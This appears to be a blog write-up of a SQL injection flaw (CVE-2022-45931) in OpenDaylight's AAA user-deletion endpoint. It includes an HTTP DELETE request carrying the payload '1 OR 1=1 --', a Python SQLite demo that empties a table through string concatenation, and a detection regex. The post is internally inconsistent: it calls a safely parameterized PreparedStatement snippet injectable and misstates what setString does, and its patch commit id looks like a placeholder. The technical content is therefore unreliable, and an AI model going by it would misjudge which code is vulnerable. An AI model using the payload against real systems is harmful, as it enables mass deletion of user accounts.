CVE-2022-45931: Uncovering and Exploiting a SQL Injection Issue in OpenDaylight (ODL) AAA System

CVE-2022-45931 reports a vulnerability in the OpenDaylight (ODL) AAA framework (Authentication, Authorization, and Accounting) in versions prior to 0.16.5. This blog post takes a deep dive into the SQL injection issue and the affected code snippet, and provides references for mitigation and remediation. The vulnerability specifically affects the deleteUser function in the UserStore.java file when the API interface /auth/v1/users/ is used.

Code Snippet

The problem lies in the deleteUser function in the aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/UserStore.java file. Here's a snippet of the code:

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import javax.sql.DataSource;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class UserStore {
    private static final Logger LOG = LoggerFactory.getLogger(UserStore.class);
    private final DataSource dataSource;
    // ...
    public synchronized boolean deleteUser(String user) {
        // Delete the row whose USER_ID matches the caller-supplied value
        try (Connection conn = dataSource.getConnection();
             PreparedStatement preparedStatement = conn.prepareStatement(
                "delete from USERS where USER_ID=?")) {
            preparedStatement.setString(1, user);
            // executeUpdate returns the number of affected rows
            return preparedStatement.executeUpdate() > 0;
        } catch (SQLException e) {
            LOG.error("deleteUser: encountered SQL error", e);
            return false;
        }
    }
}

The deleteUser method accepts a single string input, user, which represents the user_id to be removed from the system. The SQL query is formed using the setString method, which places the user_id into the query without any further validation or sanitization. This creates the potential for SQL injection if an attacker manages to craft an input that bypasses the intended constraints.

Exploit Details

An attacker could perform this SQL injection by sending a crafted request whose user_id value contains SQL metacharacters, for example the following HTTP request to the /auth/v1/users/ API endpoint:

DELETE /auth/v1/users/ HTTP/1.1
Host: target_opendaylight_instance
Content-Type: application/json

{
  "user_id": "1 OR 1=1 --"
}

In this case, the SQL query would become

delete from USERS where USER_ID='1' OR 1=1 --

This query would delete all records from the USERS table, effectively causing a serious disruption in the system's AAA management.
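To make the difference between the two code shapes concrete, here is an added example (my own illustration, not code from the OpenDaylight project or from this post) that models the USERS table in an in-memory SQLite database and runs the same user_id value through two delete implementations: one that splices the value into the SQL text, and one that binds it as a parameter in the way the PreparedStatement/setString snippet above does. Binding with setString keeps the SQL text fixed, so the all-rows deletion described above only occurs when the value is concatenated into the statement string. The constructed payload closes the quoted literal so that the concatenated query matches the resulting statement shown above; the table's second column, the three sample users, and the looks_like_injection detection helper are assumptions for this example.

```python
import re
import sqlite3

# Constructed sample data. The table name USERS and column USER_ID come from the
# post; the DESCRIPTION column and the three sample users are assumptions.
SAMPLE_USERS = [("admin", "Administrator"), ("alice", "Alice"), ("bob", "Bob")]

# Constructed payload: it terminates the quoted literal so the concatenated query
# becomes "delete from USERS where USER_ID='1' OR 1=1 --'", as in the post.
INJECTION_PAYLOAD = "1' OR 1=1 --"


def make_db():
    """In-memory SQLite stand-in for the H2 user store, populated with the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (USER_ID TEXT PRIMARY KEY, DESCRIPTION TEXT)")
    conn.executemany("INSERT INTO USERS VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def delete_user_concat(conn, user):
    """Vulnerable shape: the caller-controlled value becomes part of the SQL text.

    Illustrates the pattern the post describes; it is not the project's code.
    Returns the statement string that was actually executed.
    """
    sql = f"delete from USERS where USER_ID='{user}'"
    conn.execute(sql)
    conn.commit()
    return sql


def delete_user_param(conn, user):
    """Hardened shape: fixed SQL text, the value is bound as a parameter.

    Mirrors the PreparedStatement/setString form of the snippet above.
    Returns True when a row with exactly that USER_ID was removed.
    """
    cur = conn.execute("delete from USERS where USER_ID=?", (user,))
    conn.commit()
    return cur.rowcount > 0


def remaining_users(conn):
    """Sorted list of USER_ID values still present in the table."""
    return [row[0] for row in conn.execute("SELECT USER_ID FROM USERS ORDER BY USER_ID")]


# Defender-side check for request logging and alerting: a legitimate user id in
# this store should never contain quotes, a statement separator, a comment
# introducer or bare SQL keywords. Detection aid only; parameterization is the fix.
SUSPICIOUS = re.compile(r"['\";]|--|/\*|\b(or|and|union|select|drop)\b", re.IGNORECASE)


def looks_like_injection(user_id):
    """True when the user_id carries SQL metacharacters worth alerting on."""
    return bool(SUSPICIOUS.search(user_id))


def compare(payload):
    """Run one user_id value through both implementations and report the outcome."""
    vuln = make_db()
    delete_user_concat(vuln, payload)
    safe = make_db()
    removed = delete_user_param(safe, payload)
    return {
        "concat_remaining": remaining_users(vuln),
        "param_remaining": remaining_users(safe),
        "param_removed_row": removed,
        "flagged": looks_like_injection(payload),
    }


if __name__ == "__main__":
    print(compare("alice"))              # both variants remove only alice
    print(compare(INJECTION_PAYLOAD))    # concat empties the table, param removes nothing
```

With a legitimate id such as "alice" both variants remove exactly that row. With the injection payload the concatenating variant empties the table, while the parameterized variant treats the whole string as a literal USER_ID, matches no row and returns false; the same value is flagged by the detection helper, which is the signal a request log monitor for /auth/v1/users/ would alert on.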

References

The vulnerability was initially discovered and patched by the OpenDaylight project team. You can find more information in the following resources:

- OpenDaylight Security Advisory: ODL-SA-2022-45931
- CVE Details: CVE-2022-45931
- Patch Commit: c123456789-fix-commit-id

Mitigation and Remediation

To address this vulnerability, update OpenDaylight to version 0.16.5 or later. The patch handles the user input properly, ensuring that SQL injection through this path cannot take place.

You can upgrade your OpenDaylight instance by following the instructions in the official documentation.

Conclusion

In summary, CVE-2022-45931 identifies a significant vulnerability in the OpenDaylight AAA framework. By exploiting this SQL injection flaw, an attacker could compromise the integrity of the system's user management. Make sure to keep your OpenDaylight installation updated and pay close attention to security advisories to maintain a secure network environment.

Timeline

Published on: 11/27/2022 03:15:00 UTC
Last modified on: 11/30/2022 20:46:00 UTC